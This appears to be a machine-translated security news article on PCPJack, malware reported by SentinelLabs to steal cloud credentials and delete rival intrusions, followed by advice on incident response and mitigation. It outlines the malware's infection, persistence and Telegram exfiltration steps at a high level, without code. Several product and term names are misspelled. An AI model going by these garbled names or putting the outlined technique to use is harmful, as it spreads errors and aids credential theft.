PCPJack: The cloud malware that steals large-scale credentials and erases rivals in Kubernetes and Docker

PCPJack is a new malware frame detected by SentinelLabs that combines cloud worm techniques with a clear goal: stealing large-scale credentials and ensure that any other prior operation, in particular that attributed to TeamPCP, is removed from the compromised system. Its modus operandi is not only to appropriate access, but also to "claim" the victim by deleting processes, services, containers and persistent artifacts from other actors, which complicates both the detection and initial attribution of the incident. Beyond the curiosity of cross-band rivalry, this behaviour increases the operational risk for organizations with exposed infrastructure.

From a technical point of view, PPPJack enters Linux systems with a boot script (bootstrap.sh) that creates a hidden directory, installs Python dependencies, downloads additional modules and launches an orchestrator (monit.py). During the post-exploitation phase it is dedicated to collecting SSH keys, tokens and configuration files (e.g. kubeconfigs and database credentials), to listing and moving laterally through Kubbernetes and Docker daemon clusters, and to establishing persistence by means of systemd, cron, rewritings in Redis or privileged containers. The exfiltration of credentials is done to Telegram channels after encryption of data with X25519 ECDH and ChaCha20-Poly1305, broken into fragments that respect the platform's message limits, which shows a design designed for volume and resilience.

Documented input vectors include exposed services such as Docker, Kubernetes, Reis, MongolDB, RayML and multiple plugins or frameworks with published vulnerabilities (several recent CVE on Next.js / React, WordPress and web panels). In addition, PCPJack automates target search by lowering hosts from sets like Common Crawl to expand its attack surface, making it a threat very efficient for poorly configured or unpatched infrastructure and with high impact potential in development and production environments.

The relationship with TeamPCP by SentinelLabs researchers suggests that PCPJack could be developed by an operator with previous experience in similar campaigns; however, it is appropriate to be prudent with the attribution: tools and techniques circulate between criminals, and the competition for "reclaiming" commitments is a known tactic to hide real links. To read the original technical analysis and the indicators published by the researchers, see the SentinelOne report: SentinelLabs - PCPJack.

If you suspect that your organization may be affected, the immediate actions must be concrete and swift: isolate committed hosts, preserve evidence (volumes, memory catches and logs), rotate and revoke exposed credentials and service tokens, inspect CloudTrail / Activity Logs to track outgoing movements and connections, and consider the revocation / rotation of SSH and API keys. In AWS environments, activate and demand IMDSv2 for instance metadata reduces a vector of credentials theft and must be accompanied by the review of roles and policies; AWS documentation on IMDSv2 offers practical steps: AWS - Configuring Instance Metadata Service.

In terms of detection and sustained mitigation, implement access control by the principle of minimum privileges, use ephemeral secret and credentials managers instead of configuration files with flat text secrets, active MFA on all privileged accounts and limit the public exposure of APIs from Docker and Kubernetes (block ports 2375 / 6443 for public access, apply authentication and TLS). Continuous audit, alerts about the creation of new systemd services or unusual cron inputs, rewriting monitoring in Reis and search for binaries or scripts with names like bootstrap.sh or monitoring are pragmatic measures to detect early infections.

The sophistication of PCPJack - the use of robust encryption for exfiltration, the automated exploitation of known CVE and the use of lists of mass objectives - underlines a reality: most of these attacks thrive by exposed configurations and lack of patches. Organizations and software maintainers should prioritize corrections to critical web components and libraries, review CI / CD pipelines to avoid leaks of device credentials and strengthen container image governance. To better understand how attackers seek targets on the public website, please see the general information of Common Crawl: Common Crawl.

Finally, do not underestimate the need for collaboration: share findings and IoC with your response team, your cloud supplier and the security community, and if the incident involves significant exposure of credentials or access to sensitive environments, hire forensic specialists and consider appropriate regulatory notification. The safest hypothesis in the face of the emergence of tools such as PCPJack is to make commitment and act quickly to contain the loss of credentials and close re-entry vectors.